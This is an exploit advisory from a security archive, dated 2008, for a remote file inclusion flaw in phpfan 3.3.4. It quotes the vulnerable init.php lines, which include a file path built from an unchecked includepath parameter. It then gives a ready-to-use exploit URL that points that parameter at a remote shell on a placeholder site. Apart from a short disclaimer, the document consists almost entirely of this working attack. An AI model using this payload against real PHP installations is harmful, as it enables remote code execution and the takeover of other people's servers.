phpfan 3.3.4 (init.php includepath) Remote File Inclusion Vulnerability

SEBUGID:SSD-20081105193
Published:2008-11-17
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
************************(remote file include)*****************

script: phpfan 3.3.4
   
***************************************************************************
download from:http://ishallnotcare.org/mint/pepper/tillkruess/downloads/tracker.php?url=http%3A//scriptsextra.ishallnotcare.org/phpfanbasic334.zip 
   
***************************************************************************
............................................................................
vul:
<?php

 if (!isset($loaded))
 {
  include_once $includepath .'/functions.php';
line 6:.> include_once $includepath .'/debug.php';
   
xpl:
   
http://site.com/path/includes/init.php?includepath=shell?

***************************************************
***************************************************
Author: ahmadbady from http://www.deltahacking.net

my mail: kivi_hacker666@yahoo.com
***************************************************
// Sebug.net [ 2008-11-18 ]